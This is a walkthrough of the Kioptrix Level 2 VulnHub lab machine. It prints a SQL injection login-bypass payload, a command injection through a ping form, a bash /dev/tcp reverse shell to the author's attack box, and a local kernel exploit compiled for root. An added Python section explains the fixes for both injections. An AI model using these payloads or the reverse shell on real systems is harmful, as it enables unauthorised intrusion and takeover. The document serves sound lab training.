Kioptrix 1.1 ~ VulnHub

Kioptrix Level 2 from Vulnhub!


Enumeration

NMAP

First, I went ahead and launched a port scan against the target machine.

nmap -Pn -A -sV -p- $target
PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http       syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    syn-ack ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            615/udp   status
|_  100024  1            618/tcp   status
443/tcp  open  ssl/https? syn-ack ttl 64
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/[email protected]/localityName=SomeCity
618/tcp  open  status     syn-ack ttl 64 1 (RPC #100024)
631/tcp  open  ipp        syn-ack ttl 64 CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:A3:ED:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Fine tuned scan results

WEB - 80

/cgi-bin/ (Status: 403) [Size: 289]
/cgi-bin/.html (Status: 403) [Size: 294]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 315]
/usage (Status: 403) [Size: 286]

/

/manual

Exploitation

Authentication Bypass

The web app was vulnerable to SQL Injection Authentication Bypass as shown below.

admin' or '1'='1'#

http://192.168.0.132/index.php

Command Injection

I noticed that the web app executed commands on the base system based on user input.

Thus, I decided to try injecting custom commands into this field to get the system to run them.

127.0.0.1 && whoami

As seen above, I was able to get command execution on the machine via the web portal. I then used this vulnerability to get a reverse shell back to my attack box as follows.

127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1

And it worked!
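The two injections above come down to the same root cause: user input is concatenated into a string that a parser (MySQL, then /bin/sh) interprets. The following is an added example, not code from the box or from this writeup; it rebuilds both patterns in Python with a constructed sqlite3 user table (the box runs MySQL, hence the emulated `#` comment handling) and puts the hardened form of each beside it. The ping form itself is never executed here; only the command or argv it would produce is returned.

```python
import ipaddress
import sqlite3

# Constructed stand-in for the login backend: one row, hypothetical password.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'hypothetical-secret')")


def login_vulnerable(username: str, password: str) -> bool:
    """String-concatenated query: the attacker's quote and '#' rewrite it."""
    sql = (f"SELECT 1 FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    # MySQL treats '#' as a to-end-of-line comment, which is what makes the
    # page's payload drop the password check. sqlite3 has no '#' comment, so
    # emulate that parser behaviour here (demo only, not production logic).
    sql = sql.split("#", 1)[0]
    return db.execute(sql).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    """Parameterised query: the payload is compared as data, never parsed."""
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def ping_command_vulnerable(host: str) -> str:
    """The string a shell-interpolating ping form hands to /bin/sh.
    '&&' is shell syntax, so a second command rides along unchanged."""
    return f"ping -c 3 {host}"


def ping_argv_safe(host: str) -> list[str]:
    """Accept only a literal IP address and pass it as one argv element.
    No shell is involved, so metacharacters have nothing to act on, and
    anything that is not an address is rejected before it gets that far."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError as exc:
        raise ValueError(f"not an IP address: {host!r}") from exc
    return ["ping", "-c", "3", str(addr)]
```

Run the argv form with `subprocess.run(ping_argv_safe(host))` (no `shell=True`); the detection side of this is the same check, applied to the form field before it ever reaches a query or a process.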

Privilege Escalation

Linpeas

While running linpeas, I noticed that the box was running a pretty old Linux kernel version (2.6.9-55.EL).

Searchsploit

I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.

searchsploit linux 2.6 centos
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c

This was the exploit I ended up going with!

GCC

I then transferred the file over to the remote machine before compiling it with GCC, so that the resulting executable matched the target's architecture.

gcc -o exploit 9545.c

However, I ran into the error shown. C source files need a newline at the end of the file to compile, so I just had to add one before compiling again.

After fixing that, the exploit compiled with no issues.

Rooty

And I was the root user! 😁


-Nee